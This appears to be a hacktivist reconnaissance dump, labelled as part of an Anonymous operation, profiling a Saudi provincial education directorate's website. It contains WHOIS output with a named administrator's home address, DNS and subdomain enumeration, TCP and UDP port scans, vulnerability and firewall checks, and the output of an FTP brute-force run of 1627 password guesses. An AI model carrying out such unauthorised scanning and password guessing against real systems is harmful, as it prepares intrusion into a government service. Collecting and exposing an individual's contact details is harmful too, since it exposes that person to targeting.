Anonymous JTSEC #OpJamalKhashoggi Full Recon #13

#######################################################################################################################################
Hostname 	www.hbthedu.gov.sa 	  	ISP 	LeaseWeb Netherlands B.V.
Continent 	Europe 	  	Flag
NL
Country 	Netherlands 	  	Country Code 	NL
Region 	Unknown 	  	Local time 	19 Nov 2018 09:36 CET
City 	Unknown 	  	Postal Code 	Unknown
IP Address 	85.17.16.76 	  	Latitude 	52.382
  	  	  	Longitude 	4.9
#######################################################################################################################################
Server:		194.187.251.67
Address:	194.187.251.67#53

Non-authoritative answer:
www.hbthedu.gov.sa	canonical name = hbthedu.gov.sa.
Name:	hbthedu.gov.sa
Address: 85.17.16.76
#######################################################################################################################################
% SaudiNIC Whois server.
% Rights restricted by copyright.
% http://nic.sa/en/view/whois-cmd-copyright

Domain Name: hbthedu.gov.sa

 Registrant:
 MOE-Directorate of Education in Alhotaa Province وزارة التربية والتعليم- إدارة التربية والتعليم بمحافظة حوطة بني تميم والحريق
 Address: لا يوجد
  alhota
 Saudi Arabia المملكة العربية السعودية

 Administrative Contact:
  إبراهيم عبدالله موسى آل حسين
  Address: حوطة بني تميم - السلامية - حي المنار
  11941 حوطة بني تميم
  Saudi Arabia

 Technical Contact:
  إبراهيم عبدالله موسى آل حسين
  Address: حوطة بني تميم - السلامية - حي المنار
  11941 حوطة بني تميم
  المملكة العربية السعودية

 Name Servers:
  ns2.dimofinf.net
  ns1.dimofinf.net
  ns3.dimofinf.net

Created on: 2002-01-20
Last Updated on: 2015-09-22
#######################################################################################################################################
[i] Scanning Site: http://www.hbthedu.gov.sa


B A S I C   I N F O
=======================================================================================================================================


[+] Site Title: تعليم حوطة بني تميم والحريق
[+] IP address: 85.17.16.76
[+] Web Server: Could Not Detect
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Found

-------------[ contents ]----------------

#Begin Attracta SEO Tools Sitemap. Do not remove
sitemap: http://cdn.attracta.com/sitemap/4471531.xml.gz
#End Attracta SEO Tools Sitemap. Do not remove

-----------[end of contents]-------------


W H O I S   L O O K U P
=======================================================================================================================================

	% SaudiNIC Whois server.
% Rights restricted by copyright.
% http://nic.sa/en/view/whois-cmd-copyright

Domain Name: hbthedu.gov.sa

 Registrant:
 MOE-Directorate of Education in Alhotaa Province وزارة التربية والتعليم- إدارة التربية والتعليم بمحافظة حوطة بني تميم والحريق
 Address: لا يوجد
  alhota
 Saudi Arabia المملكة العربية السعودية

 Administrative Contact:
  إبراهيم عبدالله موسى آل حسين
  Address: حوطة بني تميم - السلامية - حي المنار
  11941 حوطة بني تميم
  Saudi Arabia

 Technical Contact:
  إبراهيم عبدالله موسى آل حسين
  Address: حوطة بني تميم - السلامية - حي المنار
  11941 حوطة بني تميم
  المملكة العربية السعودية

 Name Servers:
  ns2.dimofinf.net
  ns1.dimofinf.net
  ns3.dimofinf.net

Created on: 2002-01-20
Last Updated on: 2015-09-22


G E O  I P  L O O K  U P
=======================================================================================================================================

[i] IP Address: 85.17.16.76
[i] Country: NL
[i] State: N/A
[i] City: N/A
[i] Latitude: 52.382401
[i] Longitude: 4.899500


H T T P   H E A D E R S
=======================================================================================================================================


[i]  HTTP/1.1 200 OK
[i]  Date: Mon, 19 Nov 2018 08:44:27 GMT
[i]  Content-Type: text/html
[i]  Vary: Accept-Encoding
[i]  X-Pingback: http://www.hbthedu.gov.sa/xmlrpc.php
[i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
[i]  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
[i]  Pragma: no-cache
[i]  Set-Cookie: PHPSESSID=9pc8a4jo928kgfg1bpm9f7tmm3; path=/
[i]  Set-Cookie: dim_styleid=1; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/; HttpOnly
[i]  Set-Cookie: dim_lastvisit=1542617066; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/
[i]  Set-Cookie: dim_lastactivity=0; expires=Tue, 19-Nov-2019 08:44:26 GMT; path=/
[i]  Access-Control-Allow-Origin: *
[i]  X-XSS-Protection: 1; mode=block
[i]  X-Nginx-Cache-Status: HIT
[i]  X-Server-Powered-By: Dimofinf INC
[i]  Connection: close


D N S   L O O K U P
=======================================================================================================================================

hbthedu.gov.sa.		21599	IN	SOA	ns1.dimofinf.net. dedicated.server.dimofinf.net.sa. 2018092504 3600 7200 1209600 86400
hbthedu.gov.sa.		21599	IN	NS	ns3.dimofinf.net.
hbthedu.gov.sa.		21599	IN	NS	ns1.dimofinf.net.
hbthedu.gov.sa.		21599	IN	NS	ns2.dimofinf.net.
hbthedu.gov.sa.		14399	IN	A	85.17.16.76
hbthedu.gov.sa.		3599	IN	MX	10 alt3.aspmx.l.google.com.
hbthedu.gov.sa.		3599	IN	MX	10 alt4.aspmx.l.google.com.
hbthedu.gov.sa.		3599	IN	MX	1 aspmx.l.google.com.
hbthedu.gov.sa.		3599	IN	MX	5 alt1.aspmx.l.google.com.
hbthedu.gov.sa.		3599	IN	MX	5 alt2.aspmx.l.google.com.


S U B N E T   C A L C U L A T I O N
=======================================================================================================================================

Address       = 85.17.16.76
Network       = 85.17.16.76 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 85.17.16.76 - 85.17.16.76 }


N M A P   P O R T   S C A N
=======================================================================================================================================


Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-19 08:44 UTC
Nmap scan report for hbthedu.gov.sa (85.17.16.76)
Host is up (0.083s latency).
rDNS record for 85.17.16.76: unlimited6.dimofinf.net
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  open     pop3
143/tcp  open     imap
443/tcp  open     https
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
#######################################################################################################################################
[?] Enter the target: http://www.hbthedu.gov.sa/
[!] IP Address : 85.17.16.76
[!] www.hbthedu.gov.sa doesn't seem to use a CMS
[+] Honeypot Probabilty: 30%
---------------------------------------------------------------------------------------------------------------------------------------
[~] Trying to gather whois information for www.hbthedu.gov.sa
[+] Whois information found
[-] Unable to build response, visit https://who.is/whois/www.hbthedu.gov.sa
---------------------------------------------------------------------------------------------------------------------------------------
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
80/tcp   open     http
110/tcp  open     pop3
143/tcp  open     imap
443/tcp  open     https
3389/tcp filtered ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
---------------------------------------------------------------------------------------------------------------------------------------

[+] DNS Records
ns3.dimofinf.net. (95.179.144.169) AS16022 Cosmoline Telecommunication Services S.A. Greece
ns2.dimofinf.net. (167.99.30.33) United States United States
ns1.dimofinf.net. (45.55.127.247) AS14061 Digital Ocean, Inc. United States

[+] MX Records
1 (172.217.197.27) AS15169 Google Inc. United States

[+] MX Records
10 (173.194.69.27) AS15169 Google Inc. United States

[+] MX Records
10 (173.194.76.27) AS15169 Google Inc. United States

[+] MX Records
5 (74.125.193.26) AS15169 Google Inc. United States

[+] MX Records
5 (64.233.186.26) AS15169 Google Inc. United States

[+] Host Records (A)
www.hbthedu.gov.sa (unlimited6.dimofinf.net) (85.17.16.76) AS60781 LeaseWeb  B.V. Netherlands

[+] TXT Records

[+] DNS Map: https://dnsdumpster.com/static/map/hbthedu.gov.sa.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)


[+] Emails found:
--------------------------------------------------------------------------------------------------------------------------------------
pixel-1542617072115242-web-@www.hbthedu.gov.sa
pixel-1542617073214619-web-@www.hbthedu.gov.sa
No hosts found
[+] Virtual hosts:
---------------------------------------------------------------------------------------------------------------------------------------
[~] Crawling the target for fuzzable URLs
[-] No fuzzable URLs found
#######################################################################################################################################
--------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          85.17.16.76
+ Target Hostname:    85.17.16.76
+ Target Port:        443
---------------------------------------------------------------------------------------------------------------------------------------
+ SSL Info:        Subject:  /CN=unlimited6.dimofinf.net
                   Ciphers:  ECDHE-RSA-AES128-GCM-SHA256
                   Issuer:   /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=RapidSSL RSA CA 2018
+ Start Time:         2018-11-19 03:43:06 (GMT-5)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'x-server-powered-by' found, with contents: Dimofinf INC
+ Uncommon header 'x-nginx-cache-status' found, with contents: HIT
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:1408F10B:SSL routines:ssl3_get_record:wrong version number at /var/lib/nikto/plugins/LW2.pm line 5157.
 at /var/lib/nikto/plugins/LW2.pm line 5157.
;  at /var/lib/nikto/plugins/LW2.pm line 5157.
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2018-11-19 03:50:43 (GMT-5) (457 seconds)
--------------------------------------------------------------------------------------------------------------------------------------
######################################################################################################################################
[+] Hosting Info for Website: www.hbthedu.gov.sa
 [+] Visitors per day: 1,120
 [+] IP Address: ...
 [+] IP Reverse DNS (Host): unlimited6.dimofinf.net
 [+] Hosting Company: Leaseweb B.V
 [+] Hosting IP Range: 85.17.0.0 - 85.17.255.255 (65,536 ip)
 [+] Hosting Address: Ocom B.V. P.o. Box 93054, 1090 Bb Amsterdam, Netherlands
 [+] Hosting Country: NLD
 [+] Hosting Phone: +31203162880, +31 20 3162880
 [+] Hosting Website: www.leaseweb.com
 [+] Hosting CIDR: 85.17.0.0/16

 [+] NS: hbthedu.gov.sa
 [+] NS: ns3.dimofinf.net
 [+] NS: ns1.dimofinf.net
 [+] NS: ns2.dimofinf.net

#######################################################################################################################################
; <<>> DiG 9.11.5-1-Debian <<>> hbthedu.gov.sa
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11285
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;hbthedu.gov.sa.			IN	A

;; ANSWER SECTION:
hbthedu.gov.sa.		12935	IN	A	85.17.16.76

;; Query time: 133 msec
;; SERVER: 194.187.251.67#53(194.187.251.67)
;; WHEN: lun nov 19 04:01:20 EST 2018
;; MSG SIZE  rcvd: 59
#######################################################################################################################################

; <<>> DiG 9.11.5-1-Debian <<>> +trace hbthedu.gov.sa
;; global options: +cmd
.			80568	IN	NS	d.root-servers.net.
.			80568	IN	NS	i.root-servers.net.
.			80568	IN	NS	j.root-servers.net.
.			80568	IN	NS	k.root-servers.net.
.			80568	IN	NS	b.root-servers.net.
.			80568	IN	NS	m.root-servers.net.
.			80568	IN	NS	f.root-servers.net.
.			80568	IN	NS	g.root-servers.net.
.			80568	IN	NS	e.root-servers.net.
.			80568	IN	NS	a.root-servers.net.
.			80568	IN	NS	h.root-servers.net.
.			80568	IN	NS	l.root-servers.net.
.			80568	IN	NS	c.root-servers.net.
.			80568	IN	RRSIG	NS 8 0 518400 20181202050000 20181119040000 2134 . meDpq/b38HWFlXKvvUtXs5wZXwy8+gqnFfQfx6abJibsigdRq66gnlvP h0kjBBpe6/lh5W64h9TgsaUvSBesksp1Gmq4hsAbNzVAL9x2dw164E6u CAaFirx1EQIlT+9crbsMyJ28JI2gXJfLP2biefKgpgtPqSJe3f2hdaga 0ZNnAnwigU+My4qR7R0oLfNGWq1zZjPEUMH2Pk67626IdDmWwfnYWPv1 NcY+FYv5gQXYd6tG/4KryFiFcBaXC7TIhkfx/AnOjxIIgqFR/1pdPnRg ALKnokzUXqJeklbp81N1st1nkEb3g0h1paCrYqZK78cO1NdRkHDrMgHq ScAFTQ==
;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 135 ms

sa.			172800	IN	NS	s2.nic.net.sa.
sa.			172800	IN	NS	sa1.dnsnode.net.
sa.			172800	IN	NS	s.nic.net.sa.
sa.			172800	IN	NS	ns1.nic.net.sa.
sa.			172800	IN	NS	ns1.isu.net.sa.
sa.			172800	IN	NS	sa-ns.anycast.pch.net.
sa.			172800	IN	NS	ns2.nic.net.sa.
sa.			86400	IN	DS	22825 8 2 79A442F599B302034C6B635B50EDB3C801BD72936F7642D936F6D9A4 7B7A29BC
sa.			86400	IN	RRSIG	DS 8 1 86400 20181202050000 20181119040000 2134 . jtoV64bh+cpVCkTKqJNdhzF6b9V95ciUrEuNiXfy9Y55PgAu4i235RHb FtV1wdmDjrpDGxvrnah/py1xuAylbcbP5kEB9/OskU5n6XvPeuHjixGB SwmrrYy+OjG613whVQA8ifB/UJS5cqUw7aor6GIm6//vwaUHBAO6Pam/ 7lKJnNLLpBvn0u+5TSik5mvjmk8T0gmV88i0Rz5Eqo3/cGJEt2ZrhRID HyCR3Rf7rLpIYekIrmD+jl4FRY7GtPdVyewRL8d6fuXiwXh8U0qu17OE Wqi0TLwWswI5OkVbBS1MKX2CE3qcq/Otd7OSNfLXaYEcW1/VygwjCmo6 4weVow==
;; Received 846 bytes from 2001:500:2::c#53(c.root-servers.net) in 139 ms

hbthedu.gov.sa.		3600	IN	NS	ns1.dimofinf.net.
hbthedu.gov.sa.		3600	IN	NS	ns2.dimofinf.net.
hbthedu.gov.sa.		3600	IN	NS	ns3.dimofinf.net.
g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF I3BDV7GTACH085SBC52NJJ1N1EENJ2ME NS SOA RRSIG DNSKEY NSEC3PARAM
g75dg7hmve0juol4982jhoobsdn6bgh3.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133818 20181114123901 20031 gov.sa. D9BEpJISsR8ncsaecrUL4lij+sJFGO7OV0P2i5NJ1SSnJIPm//+ts/jA HcMCjGCZlmQIZRg/v+xyqsUDLJDmTkIBa1NTgcNP8QEwYCXPIi4QjC7l l4OsYb1eiKvgonVlfzePEigBBmtjwqMGzRpk3S3FzLqvCvvbeV8vYfDU f1bjaXjd6DCO0gxyFQl8FWK73ZThPI/5JeP0ln8z+5z8QyNQF2JSRykk fY170NflRrCzBzlAXAzW5euCddQIzJsb11yZwLFIEnYIF9IkQIPa83/d IdyBSsLBxEEsB0LXe5qQQcsLCqbCaPx4katdZemODRowJUCnXaKIX1yf p9noaA==
02npgm012psd07m9gub3f340qs00906q.gov.sa. 3600 IN NSEC3 1 1 5 2174B4E5DB5E22BF AQGGLRHVB4BVV6DJSOMF02F370AIHT2E NS DS RRSIG
02npgm012psd07m9gub3f340qs00906q.gov.sa. 3600 IN RRSIG NSEC3 8 3 3600 20181128133919 20181114123901 20031 gov.sa. I/epld+DBrq1xNXix6MDvCtVwnDfKEN0cXED8lUp2RJjd7eJ3DreOH1X 9w4m7ZSTHEZYD6aZzNdlYfDPIFo4o2RBVIyJH7KmRuIPSmAgcZovRfcC p7yTQCf8UuuVIa10bJg9WL5sszhWAN2NMxpD0fxxZxGBL2RsEDyyFw7j jTWrajJ9+s/Ue32Vf0aXrHQjScnIUVo9QjC9k3mjHJFNcTs13MHYUUnC cpUTPsKdHbYjuyzScbfJJWiY0lsPKeWwhhoMer2FiyFvnGEgtlhAX7tB JmY2MP60PTZ+LwprHg3MtE9UoX3L7QyFnOg8OfT10BqwpA+WJ+jClWoM Z3IQFg==
;; Received 872 bytes from 86.111.196.9#53(ns2.nic.net.sa) in 239 ms

hbthedu.gov.sa.		14400	IN	A	85.17.16.76
hbthedu.gov.sa.		86400	IN	NS	ns1.dimofinf.net.
hbthedu.gov.sa.		86400	IN	NS	ns3.dimofinf.net.
hbthedu.gov.sa.		86400	IN	NS	ns2.dimofinf.net.
;; Received 173 bytes from 2400:6180:0:d1::5c5:c001#53(ns2.dimofinf.net) in 283 ms

#######################################################################################################################################
[*] Performing General Enumeration of Domain: hbthedu.gov.sa
[-] DNSSEC is not configured for hbthedu.gov.sa
[*] 	 SOA ns1.dimofinf.net 45.55.127.247
[*] 	 NS ns2.dimofinf.net 167.99.30.33
[*] 	 Bind Version for 167.99.30.33 9.9.4-RedHat-9.9.4-61.el7_5.1
[*] 	 NS ns2.dimofinf.net 2400:6180:0:d1::5c5:c001
[*] 	 Bind Version for 2400:6180:0:d1::5c5:c001 9.9.4-RedHat-9.9.4-61.el7_5.1
[*] 	 NS ns3.dimofinf.net 95.179.144.169
[*] 	 Bind Version for 95.179.144.169 9.9.4-RedHat-9.9.4-61.el7_5.1
[*] 	 NS ns3.dimofinf.net 2001:19f0:5001:14ec:5400:1ff:fe99:544c
[*] 	 Bind Version for 2001:19f0:5001:14ec:5400:1ff:fe99:544c 9.9.4-RedHat-9.9.4-61.el7_5.1
[*] 	 NS ns1.dimofinf.net 45.55.127.247
[*] 	 Bind Version for 45.55.127.247 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
[*] 	 NS ns1.dimofinf.net 2604:a880:800:10::23:1001
[*] 	 Bind Version for 2604:a880:800:10::23:1001 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
[*] 	 MX alt3.aspmx.l.google.com 108.177.125.26
[*] 	 MX aspmx.l.google.com 173.194.76.26
[*] 	 MX alt1.aspmx.l.google.com 64.233.164.27
[*] 	 MX alt2.aspmx.l.google.com 172.217.194.27
[*] 	 MX alt4.aspmx.l.google.com 74.125.195.27
[*] 	 MX alt3.aspmx.l.google.com 2404:6800:4008:c01::1a
[*] 	 MX aspmx.l.google.com 2a00:1450:400c:c09::1a
[*] 	 MX alt1.aspmx.l.google.com 2a00:1450:4010:c07::1a
[*] 	 MX alt2.aspmx.l.google.com 2404:6800:4003:c04::1b
[*] 	 MX alt4.aspmx.l.google.com 2607:f8b0:400e:c09::1a
[*] 	 A hbthedu.gov.sa 85.17.16.76
[*] Enumerating SRV Records
[*] 	 SRV _carddav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2079 0
[*] 	 SRV _carddav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2079 0
[*] 	 SRV _caldavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2080 0
[*] 	 SRV _caldavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2080 0
[*] 	 SRV _carddavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2080 0
[*] 	 SRV _carddavs._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2080 0
[*] 	 SRV _caldav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 85.17.16.76 2079 0
[*] 	 SRV _caldav._tcp.hbthedu.gov.sa unlimited6.dimofinf.net 2001:1af8:4700:a075:14:: 2079 0
[+] 8 Records Found
#######################################################################################################################################

Ip Address	Status	Type	Domain Name			Server
---------------------------------------------------------------------------------------------------------------------------------------
85.17.16.76     200     host    ftp.hbthedu.gov.sa
85.17.16.76     302     alias   mail.hbthedu.gov.sa
85.17.16.76	302	host	hbthedu.gov.sa
85.17.16.76     200     alias   www.hbthedu.gov.sa
85.17.16.76	200	host	hbthedu.gov.sa
#######################################################################################################################################
[+] Testing domain
   	www.hbthedu.gov.sa          85.17.16.76
[+] Dns resolving
       Domain name               Ip address              Name server
      hbthedu.gov.sa            85.17.16.76        unlimited6.dimofinf.net
Found 1 host(s) for hbthedu.gov.sa
[+] Testing wildcard
	Ok, no wildcard found.

[+] Scanning for subdomain on hbthedu.gov.sa
[!] Wordlist not specified. I scannig with my internal wordlist...
    Estimated time about 71.16 seconds

        Subdomain                Ip address              Name server

    ftp.hbthedu.gov.sa          85.17.16.76        unlimited6.dimofinf.net
   mail.hbthedu.gov.sa          85.17.16.76        unlimited6.dimofinf.net
    www.hbthedu.gov.sa          85.17.16.76        unlimited6.dimofinf.net

Found 3 subdomain(s) in 3 host(s) in 275.18 second(s)
#######################################################################################################################################
*] Processing domain hbthedu.gov.sa
[+] Getting nameservers
167.99.30.33 - ns2.dimofinf.net
95.179.144.169 - ns3.dimofinf.net
45.55.127.247 - ns1.dimofinf.net
[-] Zone transfer failed

[+] MX records found, added to target list
10 alt3.aspmx.l.google.com.
1 aspmx.l.google.com.
5 alt1.aspmx.l.google.com.
5 alt2.aspmx.l.google.com.
10 alt4.aspmx.l.google.com.

[*] Scanning hbthedu.gov.sa for A records
85.17.16.76 - hbthedu.gov.sa
85.17.16.76 - autoconfig.hbthedu.gov.sa
85.17.16.76 - autodiscover.hbthedu.gov.sa
85.17.16.76 - ftp.hbthedu.gov.sa
85.17.16.76 - mail.hbthedu.gov.sa
85.17.16.76 - www.hbthedu.gov.sa
#######################################################################################################################################

Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:43 EST
Nmap scan report for 85.17.16.76
Host is up (0.13s latency).
Not shown: 461 filtered ports, 5 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
8890/tcp open  ddi-tcp-3
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:43 EST
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).
Not shown: 2 filtered ports, 1 closed port
PORT     STATE         SERVICE
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:44 EST
Nmap scan report for 85.17.16.76
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
| ftp-brute:
|   Accounts: No valid accounts found
|_  Statistics: Performed 1627 guesses in 185 seconds, average tps: 11.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (94%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), HP P2000 G3 NAS device (92%), Oracle VM Server 3.4.2 (Linux 4.1) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 9 hops

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   121.10 ms 10.251.200.1
2   121.34 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   131.98 ms 82.102.29.40
4   130.76 ms 176.10.83.5
5   134.25 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   134.22 ms be-104.br02.ams-01.nl.leaseweb.net (31.31.38.143)
7   133.10 ms 81.17.34.17
8   132.11 ms po-1006.ce01.ams-01.nl.leaseweb.net (81.17.33.131)
9   132.33 ms 85.17.16.76
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:47 EST
Nmap scan report for 85.17.16.76
Host is up.

PORT   STATE         SERVICE VERSION
67/udp open|filtered dhcps
|_dhcp-discover: ERROR: Script execution failed (use -d to debug)
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   121.87 ms 10.251.200.1
2   123.60 ms 185.94.189.129
3   131.58 ms 82.102.29.40
4   131.55 ms 176.10.83.5
5   134.41 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   134.36 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   134.41 ms 81.17.34.23
8   133.26 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
9   ... 30
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:50 EST
Nmap scan report for 85.17.16.76
Host is up.

PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   120.75 ms 10.251.200.1
2   134.64 ms 185.94.189.129
3   150.40 ms 82.102.29.40
4   130.38 ms 176.10.83.5
5   133.16 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   132.75 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   133.16 ms 81.17.34.23
8   132.15 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
9   ... 30
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:52 EST
Nmap scan report for 85.17.16.76
Host is up.

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   121.81 ms 10.251.200.1
2   122.24 ms 185.94.189.129
3   131.43 ms 82.102.29.40
4   131.46 ms 176.10.83.5
5   134.21 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   133.83 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   133.87 ms 81.17.34.23
8   133.21 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
9   ... 30
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://85.17.16.76
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 14
#######################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://85.17.16.76...
_________________ SITE INFO __________________
IP              Title
85.17.16.76

__________________ VERSION ___________________
Name            Versions   Type

______________________________________________
Time: 23.3 sec  Urls: 600  Fingerprints: 40401
#######################################################################################################################################
HTTP/1.1 200 OK
Date: Mon, 19 Nov 2018 08:56:11 GMT
Content-Type: text/html
Content-Length: 163
Last-Modified: Tue, 07 Aug 2018 09:12:42 GMT
X-XSS-Protection: 1; mode=block
X-Nginx-Cache-Status: EXPIRED
X-Server-Powered-By: Dimofinf INC
Accept-Ranges: bytes
Connection: keep-alive
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:56 EST
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).

PORT    STATE    SERVICE VERSION
110/tcp filtered pop3
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   125.68 ms 85.17.16.76
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:56 EST
Nmap scan report for 85.17.16.76
Host is up.

PORT    STATE         SERVICE VERSION
123/udp open|filtered ntp
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   120.79 ms 10.251.200.1
2   120.81 ms 185.94.189.129
3   130.40 ms 82.102.29.40
4   130.60 ms 176.10.83.5
5   133.22 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   133.25 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   133.35 ms 81.17.34.23
8   132.25 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
9   ... 30
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).

PORT    STATE         SERVICE VERSION
161/tcp filtered      snmp
161/udp open|filtered snmp
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   125.07 ms 10.251.200.1
2   125.11 ms 185.94.189.129
3   134.81 ms 82.102.29.40
4   134.85 ms 176.10.83.5
5   138.39 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   136.95 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   137.58 ms 81.17.34.23
8   136.57 ms po-1002.ce02.ams-01.nl.leaseweb.net (81.17.33.135)
9   ... 30
#######################################################################################################################################

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://85.17.16.76
#######################################################################################################################################


 AVAILABLE PLUGINS
 -----------------

  PluginHSTS
  PluginSessionResumption
  PluginSessionRenegotiation
  PluginCertInfo
  PluginOpenSSLCipherSuites
  PluginChromeSha1Deprecation
  PluginHeartbleed
  PluginCompression


 CHECKING HOST(S) AVAILABILITY
 -----------------------------

   85.17.16.76:443                     => 85.17.16.76:443


 SCAN RESULTS FOR 85.17.16.76:443 - 85.17.16.76:443
